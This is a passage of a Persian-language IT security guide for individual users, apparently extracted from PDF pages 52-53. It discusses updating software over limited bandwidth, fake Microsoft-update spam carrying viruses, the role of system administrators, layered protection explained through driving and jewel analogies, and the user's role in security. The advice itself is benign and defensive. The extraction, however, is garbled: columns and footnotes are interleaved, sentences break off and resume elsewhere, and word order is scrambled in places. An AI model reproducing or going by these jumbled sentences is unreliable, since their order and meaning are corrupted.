• ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻭﺻـﻠﻪﻫـﺎﻱ ٧ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻛـﻪ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴـﺖ ﺍﺳـﺖ ﺑـﻪ ﭘﻬﻨـﺎﻱ ﺑﺎﻧﺪ ٨ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑـﺮﺍﻱ ﻛـﺴﻲ ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﺪﻩ ﻭ ﺳﺮﻋﺖ ﺍﺭﺗﺒﺎﻁ ﻭﻱ ﺩﺭ ﺣﺪ ﻣﮕﺎﺑﺎﻳﺖ ﺍﺳﺖ ﻣﺸﻜﻠﺴﺎﺯ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﺷﺪﺕ ﻣﺤـﺪﻭﺩ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﻭﻗﺎﺕ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﺍﺳﺖ ﻭ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ Patches Bandwidth 7 8 ﺑﺨﺶ ﺩﻭﻡ ﺳﺆﺍﻻﺕ ﻣﻄﺮﺡ ﺷﺪﻩ ﺳﺆﺍﻻﺕ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺑﻪ ﺗﺨﻤﻴﻦ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﻫﺰﻳﻨﻪ ﻭ ﺯﻣﺎﻥ ﻻﺯﻡ ﻭ ﻧﻴﺰ ﻣﺸﻜﻼﺕ ﺟـﺎﻧﺒﻲ ﺁﻥ ﺩﺍﺭﻳـﺪ .ﺑـﺪﻭﻥ ﻭﺟـﻮﺩ ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻃﻮﻝ ﻓﺮﺁﻳﻨـﺪ ﺩﭼـﺎﺭ ﻧﺎﺍﻣﻴـﺪﻱ ﺷﻮﻳﺪ؛ ﻳﺎ ﭘﺮﻭﮊﺓ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﻟﻐﻮ ﻧﻤـﻮﺩﻩ ﻭ ﺳـﭙﺲ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻭﻥ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻴﺎﺑﻴﺪ .ﺩﺭ ﺍﺩﺍﻣـﻪ ﺩﺭ ﻣـﻮﺭﺩ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺗﻮﺿـﻴﺢ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ. ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﺪ ،ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ ﺑـﺎﺯﻛﺮﺩﻥ ﻭ ﻳـﺎ ﺑـﺎﺯ ﻧﻜـﺮﺩﻥ ﺁﻥ ﺗﺼﻤﻴﻢ ﮔﻴﺮﻱ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﻁ ﺩﺭ ﺯﻧﺪﮔﻲ ﺭﻭﺯﻣـﺮﻩ ﻧﻴـﺰ ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭ ﺧﻮﺷـﺎﻳﻨﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﺍﮔـﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻋﺒـﻮﺭ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻣﺮﺍﻗﺐ ﺁﻣﺪ ﻭ ﺭﻓﺖ ﻣﺎﺷﻴﻨﻬﺎ ﺑﺎﺷﻴﺪ. ٥٢ ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺑﺮﺍﻱ ﺑﺎﺯﻩﻫﺎﻱ ﻃﻮﻻﻧﻲﻣﺪﺕ ﻫﻢ ﻣﻘـﺮﻭﻥ ﺑﻪ ﺻﺮﻓﻪ ﻧﻴﺴﺖ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺑﻬﺘﺮ ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻝ ﺭﺍ ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻛـﺮﺩﻩ ﻭ ﻧــﺴﺨﻪﻫــﺎﻱ downloadﺷــﺪﺓ ﺁﻧﻬــﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ ﻻ ﺩﻳﮕــﺮﺍﻥ ﻗــﺮﺍﺭ ﺩﻫــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﻣﻌﻤــﻮ ﹰ ﻣﺸﻜﻠﺘﺮ ﺍﺯ downloadﻛـﺮﺩﻥ ﻣـﺴﺘﻘﻴﻢ ﺗﻮﺳـﻂ ﻫـﺮ ﻛﺎﺭﺑﺮ ﺍﺳﺖ؛ • ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪ ﺍﻱ ﺩﺭ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ ﻻ ﻧﺴﺒﺖ ﺑﻪ ﭼﻨـﻴﻦ ﻛﻤﻚ ﻣﻲﻛﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻣﻌﻤﻮ ﹰ ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺣﺴﺎﺳﻴﺖ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﻻ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﻛﺎﻣـﻞ ﺁﻥ ﻭ ﻫﺸﺪﺍﺭﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻣﻌﻤﻮ ﹰ ٩ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﻣـﺸﻜﻞﺁﻓـﺮﻳﻦ ﺩﺭﻳﺎﻓـﺖ ﻛﻨﻴﺪ ﻛﻪ ﺍﺩﻋﺎ ﺩﺍﺭﺩ ﻳﻚ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺍﺯ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﺷﺎﻣﻞ ﺿﻤﻴﻤﺔ " "Updateﺍﺳﺖ ﻭﻟﻲ ﺑﺎﻳـﺪ ﻻ ﺿﻤﻴﻤﻪﻫﺎﻱ ﺍﻳﻦ ﻧﺎﻣـﻪﻫـﺎ ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ ﭼﻴﺰﻱ ﺟﺰ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻄﺮﻧﺎﻙ ﻧﻴﺴﺘﻨﺪ؛ ﻭ • ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ )ﻣﺮﺍﻛــﺰ ﻛــﺎﺭﻱ ،ﻣــﺪﺍﺭﺱ ،ﺍﺩﺍﺭﻩﻫــﺎﻱ ﺩﻭﻟﺘــﻲ( ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ ﺷﺨﺼﻲ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ١٠ﺟﻬﺖ ﺍﻋﻤﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ. 
ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺩﻳﮕـﺮﺍﻥ ﻧﻴﺰ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ ﺗﻌﺎﻣـﻞ ﻣﻨﺎﺳـﺐ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺩﺍﺭﺓ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ ﺩﻳﮕﺮ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺸﺨﺺ ﻛﺮﺩﻥ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﮔﺮﻭﻫﻬﺎﻱ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻧﻔﺮﻩ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ. ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓﺮﺩﻱ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ .ﺍﻛﻨﻮﻥ ﻛﻪ ﺷﻤﺎ ﻣﻔﻬﻮﻡ ﺧﻄﺮﺍﺕ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩ ﻭ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧـﺪ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ ،ﻗﺎﺩﺭ ﻫﺴﺘﻴﺪ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓـﺮﺩﻱ ﺭﺍ ﺑــﻪ ﺍﺟــﺮﺍ ﺩﺭ ﺁﻭﺭﻳــﺪ .ﭘــﺲ ﺍﺯ ﺍﺭﺯﻳــﺎﺑﻲ ﻗﻴﻤﺘﻬــﺎ ،ﺯﻣــﺎﻥ ﻻﺯﻡ ﻭ ۹ ﻫﺮﭼﻨﺪ ﺑﺎ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺟﺎﻣﻌـﻪ ،ﺍﻳـﻦ ﻭﺿـﻊ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ ﻣﻲﺷﻮﺩ. System Administrator 10 ﺩﺭﺩﺳﺮﻫﺎﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠـﻪ ﺑﺮﺳـﻴﺪ ﻛـﻪ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺑﻌﻀﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺯﻣـﺎﻥ ﺣﺎﺿـﺮ ﺿـﺮﻭﺭﻱ ﻧﻴﺴﺖ .ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﺎﺻﻲ ﺗﻜﻴﻪ ﻣﻲﻛﻨﺪ ﺍﻣـﺎ ﻛﻤﺎﻛـﺎﻥ ﺑﺎﻳـﺪ ﻓﺮﺁﻳﻨـﺪ ﻫـﺎ ،ﻗـﻮﺍﻧﻴﻦ ،ﻭ ﻣﻼﺣﻈـﺎﺕ ﺷﺨﺼﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ. ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺍﺯ ﻻﻳﻪﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ ﻭ ﻫﺮ ﻻﻳﻪ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑـﺮﺩ .ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﻻﻳــﻪﻫــﺎﻱ ﻣﺨﺘﻠــﻒ ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ ﻣــﺴﻠﻤﹰﺎ ﺩﺭ ﭘﻴــﺸﮕﻴﺮﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﺑﻴﺸﺘﺮﻱ ﻣﻮﻓﻖ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ .ﻋﻤﻞ ﺭﺍﻧﻨﺪﮔﻲ ﺭﺍ ﺩﺭﻧﻈـﺮ ﺑﻴﺎﻭﺭﻳﺪ .ﺑﻨﻈﺮ ﺷﻤﺎ ﭼﻪ ﺗﺪﺍﺑﻴﺮﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺪﻳـﺸﻴﺪ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﻭﻗﻮﻉ ﺗﺼﺎﺩﻑ ﻛﺎﻫﺶ ﻳﺎﺑﺪ؟ ﺑﻌﻀﻲ ﺍﺯ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩﺍﻧﺪ: • ﭼﻨﺎﻧﭽﻪ ﻣﺎﺷﻴﻦ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻤﻴﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﻪ ﺩﺭﺳﺘﻲ ﺗﻌﻤﻴﺮ ﺷﻮﺩ. • ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺑﺎ ﺩﻗﺖ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ. • ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﺧﺎﻧـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻭﺟـﻮﺩ ﻋﻴﺒـﻲ ﺩﺭ ﻣﺎﺷـﻴﻦ ﻫﺸﺪﺍﺭ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳﻼﻣﺖ ﺍﻓﺮﺍﺩ ﻣﺮﺗﺒﻂ ﺑﺎﺷﺪ ،ﺁﻥ ﻋﻴـﺐ ﺑﺎﻳﺪ ﺳﺮﻳﻌﹰﺎ ﺭﻓﻊ ﮔﺮﺩﺩ. • ﻫﻨﮕﺎﻡ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺍﺣﺘﻴﺎﻁ ﻛﺮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺮﺍﻳﺘﺎﻥ ﻣﺸﻜﻞ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ. • ﺍﮔﺮ ﺩﺭ ﺭﻭﺯﻧﺎﻣﻪ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﭘﻠﻲ ﺷﻜﺴﺘﻪ ﺍﺳﺖ، ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺮ ﺭﻭﻱ ﺁﻥ ﭘﺮﻫﻴﺰ ﺷﻮﺩ. 
ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻋﻮﺍﻣﻞ ﺑﺎﻻ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻗﺎﺩﺭ ﺑـﻪ ﺗـﻀﻤﻴﻦ ﺳـﻼﻣﺖ ﺷﻤﺎ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ ،ﻭﻟﻲ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻫﻤـﺔ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺗﺼﺎﺩﻑ ﺭﺍ ﺗﺎ ﺣـﺪ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ ﺩﺍﺩ .ﺩﺭ ﺗﺪﻭﻳﻦ ﺍﺟﺰﺍﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ،ﺍﻓـﺮﺍﺩ ﺑﺎﻳـﺪ ﻻﻳـﻪﻫـﺎﻳﻲ ﺍﺯ ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧـﺪ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺣﺘـﻲ ﺗـﺎ ﺣـﺪﻭﺩﻱ ﺗﻜﺮﺍﺭﻱ ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺩﺭﻙ ﺑﻬﺘﺮ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ ﻳﻚ ﺗﻜﻪ ﺟﻮﺍﻫﺮ ﻗﻴﻤﺘﻲ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴـﺪ .ﻣـﺴﻠﻤﹰﺎ ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ ﺟﻌﺒﺔ ﺳﺮﺑﺴﺘﻪ ﻭ ﺳﭙﺲ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴـﺪ؛ ﻭ ﺟﻬﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ،ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺳـﺮﻗﺖ ﻧﻴـﺰ ﺑﻴﻤـﻪ ﺧﻮﺍﻫﻴﺪ ﻧﻤﻮﺩ .ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﻋﻤﻞ ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﭼﻨـﺪﻳﻦ ﻣﺮﺣﻠـﻪ ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺣﻞ ﺑـﻪ ﺗﻨﻬـﺎﻳﻲ ﺿـﺮﻳﺐ ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﻮﺍﻫﺮ ﺭﺍ ﻛﻤﻲ ﺑﺎﻻ ﻣﻲﺑﺮﻧﺪ ،ﻭﻟﻲ ﻣﺴﻠﻤﹰﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺗﻤﺎﻡ ﻣﺮﺍﺣﻞ ﻋﺎﻗﻼﻧﻪﺗﺮ ﺍﺳﺖ ،ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﻣﺮﺣﻠـﻪ ﺑـﺎ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ٥٣ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﻣﺮﺍﺣﻞ ﺩﻳﮕﺮ ﺩﺭ ﺭﺳﻴﺪﻥ ﺷﻤﺎ ﺑﻪ ﻣﻮﻓﻘﻴﺖ ﻼ ﺍﮔﺮ ﺷﺨﺼﻲ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻋﺘﻤـﺎﺩ ﺩﺭ ﺧﺎﻧـﻪ ﺑﺎﺷـﺪ، ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻛﺮﺩ )ﻣﺜ ﹰ ﻣﺴﻠﻤﹰﺎ ﻗﻔﻞ ﻛﺮﺩﻥ ﺩﺭ ،ﺭﺍﻩ ﻣﻨﺎﺳﺒﻲ ﻧﻴﺴﺖ(. ﻧﻘﺶ ﻛﺎﺭﺑﺮ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻭﻟﻴﻦ ﻛﺎﺭﺑﺮ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ ﻧﻘـﺶ ﻣﻬﻤـﻲ ﺩﺭ ﺗــﻀﻤﻴﻦ ﺍﻳﻤﻨــﻲ ﺭﺍﻳﺎﻧــﻪ ﻭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺁﻥ ﺩﺍﺭﺩ .ﺩﺭﻣﺠﻤــﻮﻉ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﻧﻴـﺰ ﺩﺭ ﺗـﻀﻤﻴﻦ ﺩﻗـﺖ ﺩﺭ ﻋﻤﻠﻴـﺎﺕ ﺣﻔﺎﻇـﺖ ﻭ ﺍﻳﻤﻨﻲ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧﺪ .ﺩﻗﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ ﻧﺴﺒﺖ ﺑﻪ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻧﺪ ﺧﻮﺩ ﺍﺯ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ. ﺍﻣﻨﻴﺖ ﻳﻚ ﻫﻨﺮ ﺍﺳﺖ ،ﻧﻪ ﻳﻚ ﻋﻠﻢ ﺩﺭ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﻫﻴﭻ ﺗﻀﻤﻴﻦ ﺻـﺪ ﺩﺭﺻـﺪﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ،ﭼﺮﺍﻛﻪ ﻫﻤﻴﺸﻪ ﻧﻘﺎﻳﺺ ﺗﺎﺯﻩ ﻭ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳﺪ ﻧﻔـﻮﺫ ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﻧـﻮ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻣـﺸﻜﻞ -ﻛـﻪ ﺧـﻮﺩ ﻧﺎﺷــﻲ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺍﺳﺖ -ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺍﻣﺎ ﺍﮔـﺮ ﻣﻄﺎﻟﻌـﺔ ﺩﻗﻴﻘﻲ ﺍﻧﺠﺎﻡ ﺑﮕﻴﺮﺩ ﻭ ﺍﺯ ﺗﺠﺎﺭﺏ ﻣﻮﻓﻖ ﺍﻣﻨﻴﺘﻲ ١٢ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﻮﺩ ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﻋﻤﻠﻜــﺮﺩ ﺳﻴــﺴﺘﻢ ﺍﻣﻨﻴــﺖ ﻻﺯﻡ ﺭﺍ ﺑﻮﺟــﻮﺩ ﺁﻭﺭﺩ. ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ ﮔﺮﻭﻫﻬـﺎﻱ ﭘـﺴﺘﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻛﻤﻜﻬـﺎﻱ ﺷـﺎﻳﺎﻧﻲ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺑﺎﺷـﻨﺪ، ﭼﺮﺍﻛــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺷــﺮﺍﻳﻂ ﻏﻴــﺮ ﻣﻌﻤــﻮﻝ ﻭ ﺑــﺮﻭﺯ ﻭﺿــﻌﻴﺖ ﻏﻴﺮﻋﺎﺩﻱ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﮔﺮﻓﺖ. 
Encryption Security Best Practices 11 12 ﺑﺨﺶ ﺩﻭﻡ ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻓﻨـﻮﻥ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺎ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﺷﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﻃﺮﺍﺣﻲ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺿﻌﻴﻒ ﻭ ﻳﺎ ﺧﻄﺎﻫﺎﻱ ﺍﻧـﺴﺎﻧﻲ ﺑﺎﺷﺪ .ﺍﻳﻦ 